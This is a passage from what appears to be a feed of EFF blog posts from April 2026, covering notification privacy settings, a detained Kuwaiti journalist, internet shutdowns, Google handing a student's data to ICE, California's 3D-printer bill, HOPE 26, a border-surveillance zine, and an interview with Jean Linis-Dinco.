them. Open Settings > Notifications > Notifications on lock screen and disable “Show sensitive content.” Control What Notifications AI Tools Can Access In an attempt to make notifications easier to skim, both Android and iOS offer optional ways to get notification summaries using their AI tools that summarize the content of notifications. On an individual app level, WhatsApp offers this as well. Some of these summarization tools, like Apple’s, run on the device, while others, like WhatsApp’s, do not. This can all be a lot to keep track of, and sending data off device may create some level of risk for some messages. Since this is a bit more complicated, we have another blog post that walks through the steps to take to protect messaging from accidentally ending up in AI tools built into Apple and Google's devices. For WhatsApp specifically, we have a blog detailing when you might want to turn on the app’s “Advanced Chat Privacy” feature, which can disable summaries for both yourself and others in the chat. Balancing security, privacy, and usability with something like push notifications is a complicated task. At the very least, Apple and Google should better ensure that the content of these notifications isn’t transmitted over their servers in plain text. The companies need to also make sure that device operating systems don’t back up the notification database to the cloud, and when an app is deleted, that all notification data is purged. We appreciate that apps like Signal allow you to control what’s visible with notifications on a per-app basis, and we’d like to see this level of granularity of choices in other secure messaging tools, like WhatsApp. Likewise, more apps should handle push notifications similarly to the way Signal does, where a ping is sent to wake up the app to check for messages, and the content of that message is never sent across servers.

  • EFF Calls on Kuwait to Release Journalist Ahmed Shihab-Eldin
    by Jillian C. York on April 15, 2026 at 3:04 pm

    EFF calls on the Kuwaiti government to immediately release journalist Ahmed Shihab-Eldin. An award-winning journalist and television host who worked for Al Jazeera for many years, Shihab-Eldin—a dual American-Kuwaiti citizen—was arrested in Kuwait on March 3 while visiting family. The Committee to Protect Journalists (CPJ) reported yesterday that it is believed he has been charged with spreading false information, harming national security, and misusing his mobile phone. According to the Guardian, Shihab-Eldin published footage of a U.S. Air Force F-15 E Strike Eagle crash, and posted to his Substack about the incident, noting that video circulating online showed local residents assisting the crash survivors.  Kuwait is one of several countries that has recently cracked down on reporting amidst the ongoing war. Kuwait’s Ministry of Interior posted on X on March 3—the same day Shihab-Eldin was arrested—warning people in the country “not to photograph or publish any clips or information related to missiles or relevant locations.” Earlier this month, the UN Office of the High Commissioner for Human Rights (OHCHR) highlighted a new decree in Kuwait banning the circulation of reports that seek to “undermine the prestige of the military” or erode public trust in it.  As reported by local media, the decree states that “those who intentionally publish statements or news or circulate false reports and rumors about military authorities resulting in weakening the trust in them and their morale, in addition to undermining their prestige, are punishable by three to 10 years in jail and a fine between KD 5,000 and 10,000.” The decree also imposes a penalty ranging from seven years to life imprisonment for “authorized people who cause financial loss or damage to the military authorities while carrying out a transaction, operation, project or case or obtaining any profit from such deals.” In contrast to neighboring Gulf states, Kuwait has historically allowed the press to operate with relative freedom, and even introduced a law in 2020 protecting the right to access information. In practice, however, the government exercises considerable control over the media. Furthermore, there are several laws, including cybercrime legislation introduced in 2016, that restrict freedom of expression. EFF is deeply concerned that Ahmed has not been seen nor heard from in nearly six weeks. We call on the government of Kuwait to immediately release Ahmed Shihab-Eldin. 

  • Digital Hopes, Real Power: The Rise of Network Shutdowns
    by Jillian C. York on April 15, 2026 at 11:38 am

    This is the fourth installment of a blog series reflecting on the global digital legacy of the 2011 Arab uprisings. You can read the rest of the series here. Iran’s internet has been intermittently disrupted for months. After years of bombardment, Gaza’s telecommunications infrastructure remains fragile. In India, recurring shutdowns and throttling have become a routine response to protests and unrest, cutting millions off from news, work, and basic services. Across dozens of other countries, governments increasingly treat connectivity itself as something that can be weaponized—cut, slowed, or selectively restored to shape what people can see, say, and share. In 2024 alone, authorities imposed 304 internet shutdowns across 54 countries—the highest number ever recorded. In 2011, when protesters in Tunisia, Egypt, and beyond used social media to broadcast their uprisings to the world, many observers heralded a new era of networked freedom. Governments, however, responded quickly by developing and refining systems of control that have only grown more sophisticated over time. Today’s landscape of regulation, blackouts, and degraded networks reflects that trajectory, as early experiments in censorship and disruption have hardened into a durable system of control—what began as an emergency measure has become a normalized infrastructure of control. A Brief History of Internet Shutdowns Egypt’s 2011 internet shutdown wasn’t the first. Although the government’s heavy-handed response after just two days of protests caught the world’s attention, Guinea, Nepal, Myanmar, and a handful of other countries had previously enacted shutdowns. But Egypt marked a turning point. In the years that followed, shutdowns increased sharply worldwide, suggesting that governments had taken note—adopting network disruptions as a tactic for suppressing dissent and limiting the flow of information within and beyond their borders. On January 28, 2011, at 12:34 a.m. local time, five of Egypt’s internet service providers (ISPs) shut down their networks. At least one provider—Noor, which also hosted the Egyptian stock exchange—remained online, leaving only about 7% of the country connected.  In the aftermath of President Hosni Mubarak’s resignation, rights groups sought to understand how such a sweeping shutdown had been possible—and how future incidents might be prevented. There was no centralized “kill switch.” Instead, authorities leveraged the country’s highly consolidated telecommunications sector, which all operate by government license. With only a handful of ISPs, a small number of directives was enough to bring most of the network offline. In the years following Egypt’s 2011 shutdown, telecommunications companies—many of which had been directly implicated in enabling state-ordered disruptions—began to organize around a shared set of human rights challenges. Beginning that same year, a group of operators and vendors quietly convened to examine how the UN Guiding Principles on Business and Human Rights applied to their sector, particularly in contexts where government demands could translate into sweeping restrictions on access. By 2013, this effort had formalized into the Telecommunications Industry Dialogue, bringing together major global firms to develop common principles on freedom of expression and privacy and, through a partnership with the Global Network Initiative, engage more directly with civil society. The initiative reflected a growing recognition that telecom companies—unlike platforms—operate at a critical chokepoint in the network. But it also underscored the limits of voluntary approaches: while the Dialogue helped establish shared norms, it did little to constrain the legal and political pressures that continue to drive shutdowns—or to prevent companies from complying with them. From Emergency Measure to Legal Authority If the early aughts were defined by improvised shutdowns, the years since have seen governments formalize their power to control networks. What was once exceptional is now often embedded in law. In India, the 2017 Temporary Suspension of Telecom Services Rules—issued under the Telegraph Act—provided a clear legal pathway for cutting connectivity. The Telecommunications Act, 2023, further entrenched the government’s ability to enact shutdowns, granting the central and state governments, or “authorised officers” the power to suspend telecommunications services in the interest of public safety or sovereignty, or during emergencies. The government has used these measures repeatedly, particularly in Jammu and Kashmir. India’s Software Freedom Law Centre’s Shutdown Tracker shows India as instigating more than 900 shutdowns, 447 of which were in Jammu and Kashmir. In Kazakhstan, shutdowns have also become common. Over the years, the government has passed legislation that allows state agencies to shut down the internet. The 2012 law on national security enabled the government to disrupt communications channels during anti-terrorist operations and to contain riots. In 2014 and 2016, laws were further amended to expand the number of actors able to shut down the internet without a court decision, and a government decree in 2018 enabled shutdowns in the event of a “social emergency.”  Elsewhere, governments have built or expanded legal and technical frameworks that enable similar control over information flows. Ethiopia’s state-dominated telecom sector has facilitated sweeping shutdowns during periods of conflict, including the war in Tigray, where the internet was disconnected for more than two years. In Iran, authorities have developed regulatory and infrastructural capacity to isolate domestic networks from the global internet, allowing them to restrict external visibility while maintaining limited internal connectivity. This year alone, Iranians have spent one third of the year offline. And amidst the ongoing war, Iranian officials have made it clear that the internet is a privilege for those who toe the government’s official line. Even where laws do not explicitly authorize shutdowns, broadly worded provisions around national security or public order are routinely used to justify them. The result is a growing legal architecture that treats network disruptions not as extraordinary measures, but as standard tools for managing populations. When that authority is exercised over a population beyond a state’s own citizens, the consequences can be even more severe. Israel’s Ministry of Communications controls the flow of communications in and out of Palestine and has used that power to shut down internet access during periods of conflict. Over the past two and a half years, Gaza has experienced repeated outages, and experts now estimate that roughly 75% of its telecommunications infrastructure has been damaged—leaving essential services severely disrupted. Elections and the Expansion of Control Historically, most blackouts have occurred during moments of intense political tension. But authorities are increasingly using them as a tool to preempt dissent. In 2024, as more than half the world’s population headed to the polls, shutdowns followed. That year alone, authorities imposed 304 internet shutdowns across 54 countries—the highest number ever recorded, surpassing the previous record set just a year earlier. The geographic spread also widened significantly, with shutdowns affecting more countries than ever before. The Comoros imposed a shutdown for the first time, while other countries, such as Mauritius, instituted broad bans on social media platforms during elections. At least 24 countries holding elections in 2024 had a prior history of shutdowns, putting billions of people at risk of disruptions during critical democratic moments. What stands out is not just the scale, but the normalization. Notably, the number of shutdowns in 2025 broke the record set the year prior. Whereas network disruptions were once a rare occurrence, they are now a routine measure, increasingly treated by authorities as a standard response to periods of heightened political sensitivity.  Civil Society Fights Back Governments use all sorts of justifications—national security, curbing the spread of disinformation, and even preventing students from cheating on exams—for internet shutdowns. But civil society is watching, and documenting, network disruptions and their impact on citizens. In 2016, as shutdowns became an increasingly common tool of state control, Access Now launched the #KeepItOn campaign to coordinate global advocacy against network disruptions. The campaign includes a coalition composed of 345 advocacy groups (including EFF), research centers, detection networks, and others who work together to report on, and fight back against, internet shutdowns. Anyone can get involved by signing on to campaign action alerts, sharing their story, or reporting a shutdown in their jurisdiction. Ending this harmful practice remains the goal. In 2016, the UN passed a landmark resolution supporting human rights online and condemning internet shutdowns, and UN agencies have continued to warn against the practice. But the fight to change government practices remains an uphill battle, leading civil society—and even companies—to get creative.  During repeated shutdowns in Gaza, grassroots efforts mobilised to distribute eSIMs so Palestinians could stay connected. In 2024, EFF recognized Connecting Humanity, a Cairo-based non-profit providing eSIM access in Gaza, with its annual award for its vital work. Satellite internet such as Starlink has been supplied to people in Ukraine and Iran, though it, too, is not immune to state control. Alongside these efforts, civil society continues to share practical guidance on circumventing shutdowns and maintaining access to information. EFF’s mission is to ensure that technology supports freedom, justice, and innovation for all people of the world—and we’ll continue to fight back against internet shutdowns wherever they occur. This is the fourth installment of a blog series reflecting on the global digital legacy of the 2011 Arab uprisings. Read the rest of the series here.

  • Google Broke Its Promise to Me. Now ICE Has My Data.
    by Guest Author on April 14, 2026 at 4:01 pm

    In September 2024, Amandla Thomas-Johnson was a Ph.D. candidate studying in the U.S. on a student visa when he briefly attended a pro-Palestinian protest. In April 2025, Immigration and Customs Enforcement (ICE) sent Google an administrative subpoena requesting his data. The next month, Google gave Thomas-Johnson's information to ICE without giving him the chance to challenge the subpoena, breaking a nearly decade-long promise to notify users before handing their data to law enforcement.  Google names a handful of exceptions to this promise (such as if Google receives a gag order from a court) that do not apply to Thomas-Johnson's case. While ICE “requested” that Google not notify Thomas-Johnson, the request was not enforceable or mandated by a court. Today, the Electronic Frontier Foundation sent complaints to the California and New York Attorneys General asking them to investigate Google for deceptive trade practices for breaking that promise. You can read about the complaints here. Below is Thomas-Johnson's account of his ordeal.  Out of touch but not out of reach  I thought my ordeal with U.S. immigration authorities was over a year ago, when I left the country, crossing into Canada at Niagara Falls.   By that point, the Trump administration had effectively turned federal power against international students like me. After I attended a pro-Palestine protest at Cornell University—for all of five minutes—the administration’s rhetoric about cracking down on students protesting what we saw as genocide forced me into hiding for three months. Federal agents came to my home looking for me. A friend was detained at an airport in Tampa and interrogated about my whereabouts.  I’m currently a Ph.D. student. Before that, I was a reporter. I’m a dual British and Trinadad and Tobago citizen. I have not been accused of any crime.  I believed that once I left U.S. territory, I had also left the reach of its authorities. I was wrong.  The email Weeks later, in Geneva, Switzerland, I received what looked like a routine email from Google. It informed me that the company had already handed over my account data to the Department of Homeland Security.  At first, I wasn’t alarmed. I had seen something similar before. An associate of mine, Momodou Taal, had received advance notice from Google and Facebook that his data had been requested. He was given advanced notice of the subpoenas, and law enforcement eventually withdrew them before the companies turned over his data.  Google had already disclosed my data without telling me. I assumed I would be given the same opportunity. But the language in my email was different. It was final: “Google has received and responded to legal process from a law enforcement authority compelling the release of information related to your Google Account.”  Google had already disclosed my data without telling me. There was no opportunity to contest it.  Google’s broken promise To be clear, this should not have happened this way. Google promises that it will notify users before their data is handed over in response to legal processes, including administrative subpoenas. That notice is meant to provide a chance to challenge the request. In my case, that safeguard was bypassed. My data was handed over without warning—at the request of an administration targeting students engaged in protected political speech.  Months later, my lawyer at the Electronic Frontier Foundation obtained the subpoena itself. On paper, the request focused largely on subscriber information: IP addresses, physical address, other identifiers, and session times and durations.  But taken together, these fragments form something far more powerful—a detailed surveillance profile. IP logs can be used to approximate location. Physical addresses show where you sleep. Session times would show when you were communicating with friends or family. Even without message content, the picture that emerges is intimate and invasive.   State power meets private data What this experience has made clear is that anyone can be targeted by law enforcement. And with their massive stores of data, technology companies can facilitate those arbitrary investigations. Together, they can combine state power, corporate data, and algorithmic inference in ways that are difficult to see—and even harder to challenge.  The consequences of what happened to me are not abstract. I left the United States. But I do not feel that I have left its reach. Being investigated by the federal government is intimidating. Questions run through your head. Am I now a marked individual? Will I face heightened scrutiny if I continue my reporting? Can I travel safely to see family in the Caribbean?  Who, exactly, can I hold accountable? Update: This post has been updated to include more information about Google's exceptions to their notification policy, none of which applied to the subpoena targeting Thomas-Johnson.

  • EFF to State AGs: Investigate Google's Broken Promise to Users Targeted by the Government
    by Hudson Hongo on April 14, 2026 at 4:00 pm

    Google's Failure to Warn Users About Law Enforcement Demands for Data Is DeceptiveSAN FRANCISCO – The Electronic Frontier Foundation sent complaints today to the attorneys general of California and New York urging them to investigate Google for deceptive trade practices, related to the company's broken promise to give users prior notice before disclosing their information to law enforcement.  The letters were sent on behalf of Amandla Thomas-Johnson, whose information was disclosed to U.S. Immigration and Customs Enforcement (ICE) without prior notice from Google.  For nearly a decade, Google has promised billions of users that it will notify them before disclosing their personal data to law enforcement. Many times, the company has done just that. But through a hidden and systematic practice, Google has likely violated that promise numerous times over the years. This was the case for Thomas-Johnson, a Ph.D. candidate who was targeted by ICE after briefly attending a protest, effectively preventing him from contesting an invalid subpoena for his data.  "Google should answer the question: How many other times has it broken its promise to users?” said EFF Senior Staff Attorney F. Mario Trujillo. "Advance notice is especially important now, when agencies like ICE are unconstitutionally targeting users for First Amendment-protected activity. State attorneys general should investigate Google for this deception."  On Google’s Privacy & Terms page, it promises its users that “When we receive a request from a government agency, we send an email to the user account before disclosing information.” This promise ensures that users can protect their own privacy and decide to challenge overbroad or illegal demands on their own behalf. The company lists a handful of exceptions to this policy (such as if Google receives a gag order from a court) that do not apply to Thomas-Johnson's case. While ICE “requested” that Google not notify Thomas-Johnson, the request was not enforceable or mandated by a court.  But on May 8, 2025, Google complied with an administrative subpoena from ICE seeking Thomas-Johnson’s subscriber information, including his name, address, IP address, and other personal identifiers. Later that same day, the company sent Thomas-Johnson a message telling him it had already complied with the subpoena, which he would have successfully challenged had he been given advance notice. Google received the subpoena in April and had more than a month to alert Thomas-Johnson.  Communication between EFF and Google later revealed that this is a systematic issue, not an isolated one. When Google does not fulfill a subpoena within a government-provided artificial deadline, the company's outside counsel explained, Google will sometimes comply with the request and provide notice to a user on the same day. The company calls this practice “simultaneous notice.”  "What this experience has made clear is that anyone can be targeted by law enforcement," said Thomas-Johnson. "And with their massive stores of data, technology companies can facilitate those arbitrary investigations. Who, exactly, can I hold accountable?"  Google must commit to ending this deception and pay for its past mistakes. The attorneys general of California and New York are empowered to stop deceptive business practices and seek financial restitution stemming from those practices. As EFF writes in its complaints, they should investigate, hold Google to its public promise to give users advanced notice of law enforcement demands, and take appropriate action if necessary. Update: This press release has been updated to include more information about Google's exceptions to their notification policy, none of which applied to the subpoena targeting Thomas-Johnson.  For the complaints:https://www.eff.org/document/eff-letter-re-google-notice-california https://www.eff.org/document/eff-letter-re-google-notice-new-york https://www.eff.org/document/eff-letter-re-google-notice-exhibits  For Thomas-Johnson's account of his ordeal: https://www.eff.org/deeplinks/2026/04/google-broke-its-promise-me-now-ice-has-my-data For more information on lawless DHS subpoenas: https://www.eff.org/deeplinks/2026/02/open-letter-tech-companies-protect-your-users-lawless-dhs-subpoenas  Contact: press@eff.org  Tags: privacyfree speechanonymityDHSsubpoenafederal law enforcementGoogle

  • The Dangers of California’s Legislation to Censor 3D Printing
    by Cliff Braun on April 13, 2026 at 10:07 pm

    California’s bill, A.B. 2047, will not only mandate censorware — software which exists to bluntly block your speech as a user — on all 3D printers; it will also criminalize the use of open-source alternatives. Repeating the mistakes of Digital Rights Management (DRM) technologies won’t make anyone safer. What it will do is hurt innovation in the state and risk a slew of new consumer harms, ranging from surveillance to platform lock-in. California must stand with creators and reject this legislation before it’s too late. 3D printing might evoke images of props from blockbuster films, rapid prototyping, medical research, or even affordable repair parts. Yet for a growing number of legislators, the perceived threat of “ghost guns” is a reason to impose restrictions on all 3D printers. Despite 3D printing of guns already being rare and banned under existing law, California may outright criminalize any user having control over their own device.  This bill is a gift for the biggest 3D printer manufacturers looking to adopt HP’s approach to 2D printing: criminalize altering your printer’s code, lock users into your own ecosystem, and let enshittification run its course. Even worse, algorithmic print blocking will never work for its intended purpose, but it will threaten consumer choice, free expression, and privacy. A misstep here can have serious repercussions across the whole 3D printing industry, lead the way for more bad bills, and leave California with an expensive and ineffective bureaucratic mess. What’s in the California Proposal? Compared to the Washington and New York laws proposed this year, California’s is the most troubling. It criminalizes open source, reduces consumer choice, and creates a bureaucratic burden. Criminalizing Open Source and User Control A.B. 2047 goes further than any other legislation on algorithmic print-blocking by making it a misdemeanor for the owners of these devices to disable, deactivate, or otherwise circumvent these mandated algorithms. Not only does this effectively criminalize use of any third-party, open-source 3D printer firmware, but it also enables print-blocking algorithms to parallel anti-consumer behaviors seen with DRM. Manufacturers will be able to lock users into first-party tools, parts, and “consumables” (analogous to how 2D printer ink works). They will also be able to mandate purchases through first-party stores, imposing a heavy platform tax. Additionally, manufacturers could force regular upgrade cycles through planned obsolescence by ceasing updates to a printer’s print-blocking system, thereby taking devices out of compliance and making them illegal for consumers to resell. In short, a wide range of anti-consumer practices can be enforced, potentially resulting in criminal charges. Independent of these deliberate harms manufacturers may inflict, DRM has shown that criminalizing code leads to more barriers to repair, more consumer waste, and far more cybersecurity risks by criminalizing research. Less Consumer Choice The bill favors incumbent manufacturers over newer competitors and over the interests of consumers. Less-established manufacturers will need to dedicate considerable time and resources to implementing the ineffective solutions discussed above, navigating state approval, and potentially paying licensing fees to third-party developers of sham print-blocking software. While these burdens may be absorbed by the biggest producers of this equipment, it considerably raises the barrier to entry on a technology that can otherwise be individually built from scratch with common equipment. The result is clear: fewer options for consumers and more leverage for the biggest producers.  Retailers will feel this pinch, but the second-hand market will feel it most acutely. Resale is an important property right for people to recoup costs and serves as an important check on inflating prices. But under this bill, such resale risks misdemeanor penalties.  The bill locks users into a walled garden; it demands manufacturers ensure 3D printers cannot be used with third-party software tools. By creating barriers to the use of popular and need-specific alternatives, this legislation will limit the utility and accessibility of these devices across a broad spectrum of lawful uses. Bureaucratic Burden  A.B. 2047’s title 21.1 §3723.633-637 creates a print-blocking bureaucracy, leaning heavily on the California Department of Justice (DOJ). Initially, the DOJ must outline the technical standards for detecting and blocking firearm parts, and later certify print-blocking algorithms and maintain lists of compliant 3D printers. If a printer or software doesn’t make it through this red tape, it will be illegal to sell in the state. The bill also requires the department to establish a database of banned blueprints that must be blocked by these algorithms. This database and printer list must be continually maintained as new printer models are released and workarounds are discovered, requiring effort from both the DOJ and printer manufacturers.  For all the cost and burden of creating and maintaining such a database, those efforts will inevitably be outpaced by rapid iterations and workarounds by people breaking existing firearms laws. Not just California Once implemented, this infrastructure will be difficult to rein in, causing unintended consequences. The database meant for firearm parts can easily expand to copyright or political speech. Scans meant to be ephemeral can be collected and surveilled. This is cause for concern for everyone, as these levers of control will extend beyond the borders of the Golden State. While California is at the forefront of print blocking, the impacts will be felt far outside of its borders. Once printer companies have the legal cover to build out anti-competitive and privacy-invasive tools, they will likely be rolled out globally. After all, it is not cost-effective to maintain two forks of software, two inventories of printers, and two distribution channels. Once California has created the infrastructure to censor prints, what else will it be used for? As we covered in “Print Blocking Won’t Work” these print-blocking efforts are not only doomed to fail, but will render all 3D printer users vulnerable to surveillance either by forcing them into a cloud scanning solution for “on-device” results, or by chaining them to first-party software which must connect to the cloud to regularly update its print blocking system. This law demands an unfeasible technological solution for something that is already illegal. Not only is this bad legislation with few safeguards, it risks the worst outcomes for grassroots innovation and creativity—both within the state and across the global 3D printing community. California should reject this legislation before it’s too late, and advocates everywhere should keep an eye out for similar legislation in their states. What happens in California won't just stay in California.

  • EFF 🤝 HOPE: Join Us This August!
    by Christian Romero on April 13, 2026 at 7:21 pm

    Protecting privacy and free speech online takes more than policy work—it takes community. Conferences like HOPE are where that community comes together to learn, connect, and push these ideals forward. That's why EFF is proud to be at HOPE 26. Join us at this year's Hackers On Planet Earth, August 14-16 at the New Yorker Hotel in Manhattan! Get your ticket now and support our work: throughout April EFF will receive 10% of all ticket proceeds for HOPE 26.  Grab your ticket! See EFF at HOPE 26 in New York While you're there, be sure to catch talks from EFF's technologists, attorneys, and activists covering a wide range of digital civil liberties topics. You can get a taste of the talks to come by watching last year's EFF presentations at HOPE_16 on YouTube: How a Handful of Location Data Brokers Actively Tracked Millions, and How to Stop ThemIn the past year, a number of investigations have revealed the outsized role of a few select companies in gathering, storing, and selling the location data of millions of devices - and by extension people - worldwide. This talk will elaborate on the technologies, data flows, and industry players which comprise this complicated ecosystem. Ask EFFGet an update on current EFF work, including the ongoing case against the "Department" of Government Oversight, educating the public on their digital rights, organizing communities to resist ongoing government surveillance, and more. Systems of Dehumanization: The Digital Frontlines of the War Against Bodily AutonomyDaly covers the bad Internet bills that made sex work more dangerous, the ongoing struggle for abortion access in America, and the persecution of trans people across all spectrums of life. These issue-spaces are deeply connected, and the digital threats they face are uniquely dangerous. Come to learn about these threat models, as well as the cross-movement strategies being built for collective liberation against an authoritarian surveillance state.  Snag a ticket by the end of April to help support EFF's work ensuring that technology works for everyone. We hope to see you there!

  • Hot Off the Press: EFF's Updated Guide to Tech at the US-Mexico Border
    by Dave Maass on April 13, 2026 at 5:35 pm

    When people see Customs & Border Protection's giant, tethered surveillance blimp flying 20 miles outside of Marfa, Texas, lots of them confuse it with an art installation. Elsewhere along the U.S.-Mexico border, surveillance towers get mistaken for cell-phone towers. And that traffic barrel? It's actually a camera. That piece of rusted litter? That's a camera too. Today we are publishing a major update to our zine, "Surveillance Technology at the U.S.-Mexico Border," the first since the second Trump administration began. To help people identify the machinery of homeland security, we've added more models of surveillance towers, newly deployed military tech, and a gallery of disguised trail cams and automated license plate readers. You can get this 40-page, full-color guide through EFF's Shop or download a Creative-Commons licensed version here. "The Battalion Search and Rescue always carries the Electronic Frontier Foundation’s zine in our desert rig," says James Holeman, who founded the humanitarian group that looks for human remains in remote parts of New Mexico and Arizona. "We’re finding new surveillance all the time, and without a resource like that, we wouldn't know what the hell we're looking at.” The original version of the zine was distributed nearly exclusively to our allies in the borderlands—journalists, humanitarian aid workers, immigrant advocates—to help them better identify and report on the technology they discover on the ground. We only made a handful available in our online shop, and they went fast. This time, we've printed enough for our broader EFF membership. Even if you don't live near the border, you can support our work uncovering how the U.S. Department of Homeland Security's technology threatens human rights by picking up a copy. The zine is the culmination of a dozen trips to the border, where we hunted surveillance towers and other tech installations. We attended multiple border security conventions to collect promotional and technical materials directly from vendors. We filed public records requests, reviewed thousands of pages of docs, and analyzed satellite imagery of the entire 2,000-mile border several times over. Some of the images came from local allies, like geographer Dugan Meyer and Borderlands Relief Collective, who continue to share valuable intelligence on the changing landscape of border surveillance. The update is available in English, with an updated Spanish version expected later this year. In the meantime, we have reprinted the original Spanish edition. If you want to know more, a collection of EFF's broader work on border technology is available here. And if you're curious exactly where these technologies are located, you can check our ongoing map. SUPPORT THIS WORK

  • Speaking Freely: Dr. Jean Linis-Dinco
    by David Greene on April 13, 2026 at 4:38 pm

    Dr. Jean Linis-Dinco is an activist-researcher working at the intersection of human rights and technology. Born in the Philippines and shaped by firsthand experience with inequality and state violence, Jean has spent her life pushing back against systems that profit from oppression. She refuses to accept a world where tech is just another tool for corporate gain. Instead, she fights for technologies and policies that put people before profit and justice before convenience. Jean earned her PhD in Cybersecurity from the University of New South Wales, Canberra, where she exposed how governments weaponized propaganda and disinformation during the Rohingya crisis in Myanmar. She currently serves as the Digital Rights Advisor for the Manushya Foundation. David Greene: Welcome. To get started can you just introduce yourself to folks? Jean Linis-Dinco: I'm not very good at introducing myself and I rarely do so within the context of work because I always believe that people are more than their jobs. But first, I would like to thank you for this opportunity to share my thoughts. I've learned this kind of introduction from Kumu Vicky Holt Takamine in Hawai’i. She taught me how to introduce myself beyond titles. So, my name is Jean, my waters are the West Philippine Sea, and I was born and raised in the land of resistance, one of the original eight provinces that revolted against Spain as they are represented by the eight rays of the sun on the Philippine flag. My ancestors fought for the freedom of the Filipino people against Spanish colonial rule, before we became subjugated once again, this time under the United States for another 48 years. The impacts of that history continue to reverberate through the domestic and international policies that ultimately pushed me out of my own country as an overseas Filipino worker. DG: Can you tell us a bit about Manushya Foundation? JLD: Absolutely. Manushya Foundation is a women-led organization that works with activists and human rights defenders who are targeted, who face harassment and transnational repression for their work. My work with them is on the policy and advocacy side in relation to their digital rights portfolio. It involves challenging laws and policies that criminalize freedom of expression or freedom of speech online. It also means confronting the role of private corporations and private platforms. Because that power is rarely transparent. Big tech power is often unaccountable, as we've seen in recent years. Working in a civil society organization like Manushya, you get involved with the work on the ground and take part in grassroot-led advocacy confronting corporate abuse. In my work, I have met people from all sorts of backgrounds. And across those encounters, I've noticed some troubling trends in some civil society organizations. There are heaps of civil society leaders who are very keen to have a seat at the table with big tech companies. It’s often hidden behind the language of ‘stakeholder engagement’. We refuse to do that at Manushya Foundation. We don’t want to be used as a rubber stamp for decisions that have already been made behind NDAs or decisions where communities most affected by these technologies were never even in the room to begin with. I think civil society organizations should not allow themselves to be drawn into that orbit. That is very contentious in this era, because I feel like civil society bought the story that big tech could be partners in progress. We walked into their boardrooms, signing NDAs as if proximity to power meant that we were shaping it. And we've seen how in the end we're actually just giving them legitimacy. They turn our critiques and our statements to endorsements. I don't think there is any progressive form of collaboration with big tech companies that is not extractive, because the uncomfortable truth is that not everyone who wants a seat at the table is there to change what is being served. DG: I, as someone who participates in multi-stakeholder things all the time, I completely hear that criticism. One of the things I've said is, multi-stakeholder engagement as a member of civil society takes a few forms. One, you're in the room, but you don't have a seat at the table. Two, you have a seat at the table, but you don't have a microphone. And three, they give you a microphone, but they leave the room when you talk. When we as civil society do engage, we have to be very, very intentional about ensuring it’s effective engagement. We've left many things that were “multi-stakeholder” because it was actually just NGO-washing. You know, it was only so they could say that we were sort of invited to the cocktail party afterwards.  I've heard from you before that Manushya has a bit of a regional focus. Would you say it has a feminist focus or is it broader in terms of marginalized communities? JLD: At its core, Manushya is a decolonial intersectional feminist organization. What that means is that we are fundamentally concerned with systems of power. In our work, we always ask who holds the power? Who is crushed by it? And who has been deliberately kept from it? Personally, I am critical of lean-in feminism, which was popularized by a certain Meta executive. I do not agree with that kind of feminism, because it tells us women that if we just work harder, speak louder within existing power structures, we will be free. But free to do what, exactly? To participate in the same system that exploits people? The women who can afford to lean in are women who already occupy a certain class position that makes them legible to power. And most of them are white women who already have the capacity or already have a standing in society to be listened to. I cannot lean in. Because lean-in feminism was never designed for women like me. And then there is girl boss feminism, which I am also very, very critical of. Because more often than not, the women who call themselves girl bosses or self-made are not actually self-made. Behind every ‘self-made’ woman is a hidden economy of invisible labor. Often, they have maids. And often, those maids are Filipino women, women like my mother. Girl boss feminism is about one woman’s liberation built on another woman's bondage. I think it is absurd to call it feminism when it is basically just class warfare with better branding. So, yes. It gets very personal. DG: Why don’t you tell us what freedom of expression and free speech mean to you?  JLD: Well, there is this concept of freedom of speech and freedom of expression, and it is viewed as something abstract because we cannot see speech. It is intangible. We can hear it, but we cannot see it. It's not something that we hold. It is not like food, water or housing. That is precisely the problem. Because at its core freedom of expression must be understood through material conditions. What that means is that it dies in the structures that govern who gets heard, who gets punished, who gets killed, who is made disappeared, whose voices are treated as disposable. I would say freedom of expression must be understood as inseparable from justice because I do not believe anyone can claim to defend freedom of expression while tolerating systems that silence through fear, that silence through poverty, that silence through surveillance. Because a person working two jobs to make ends meet, a person targeted by the state, a person whose community is over-policed, I don't think they stand on equal ground with a media mogul or a political elite. The definition of free expression must move beyond the question of whether speech is allowed. The real foundation of freedom of expression and freedom of speech is who can speak without consequences and who pays the price for doing so. It demands responsibility and it's not a shield for domination, because when speech is used to dehumanize or to incite violence or to reinforce structures of oppression, the imperialism of domination, then that participates in harm. A serious commitment to freedom requires us to confront that harm and not hide behind languages of rights while ignoring the realities of power. DG: How do you see that? What's the example of how that plays out, for instance in the digital rights realm now? JLD: Well, there is, as you know—one could say it's even more evident in the United States—the “freedom of speech absolutist” as we’ve seen through Elon Musk. I don’t think he actually believes in freedom of speech at all. Because from what it appears, what he only cares about is maintaining the conditions under which people who look like him get to speak. Speech does not exist in a vacuum. It is always in service of something. The question is what kind of society are we actually building? I want a society where people can speak truthfully about the conditions and be heard, where dissent is not criminalized and where expression becomes a force for transformation rather than a tool for control. Free speech is a collective condition and not an individual right. It is inseparable from the question of what kind of society we are building. Because you cannot suddenly say that you are for freedom of expression while owning the platform that decides whose speech is amplified and whose is buried by an algorithm designed to serve capital. Building that society requires dismantling the structures that have always decided who gets to speak and who gets disappeared for saying the wrong thing to the wrong people. DG: It always bothers me when I hear someone like Musk being called like a free speech absolutist, because, first of all, he’s certainly not an absolutist. I actually don't know anyone who is an absolutist. But also, I don't even think he cares about free speech that much. I think that's what we see in the US a lot now, people for whom it's not a sincere belief, but they get to speak as part of their privilege. There are also other people who think they deserve the privilege to speak because, societally, they've never been subjected to controls. When they see their community of people, who historically have been able to speak, and if it's not like that, that strikes them as the most horrible infringement on freedom of speech because it disturbs their view of privilege and who speaks. And when they see marginalized voices get silenced, it doesn't bother them because that's their norm. That's how I see it. JLD: I'm here on a fellowship in the UK and my main study is on the American conquest of the Philippines through national language processing. And it's really interesting. I said during my talk that the United States no longer needs to use Nazi Germany as a metaphor to describe their contemporary politics. You know, American people just need to read history books not written by white men. DG: Okay, let's dive into the age verification stuff. I think that age verification and age mandates and age regulations trying to age gate the internet are really interesting examples of the interplay between freedom of speech and a broader repression of rights. I met you at Digital Rights in Asia Pacific Assembly (DRAPAC) 2025, and I want to just give you a platform here to share your views on age verification. I was really moved by your statement at DRAPAC and what you all published on your website. JLD: I wrote that piece at a time when Australia was pushing through that legislation. And now, we are now seeing a lot of Southeast Asian countries following that route. It always just takes one domino to fall for everyone to follow, doesn’t it? But, what surprised me is how there’s also a lot of defeatism among some civil society organizations. I feel like they already accepted the logic of the state. There’s always this preemptive surrendering the ground on which the struggle should be taking place. And 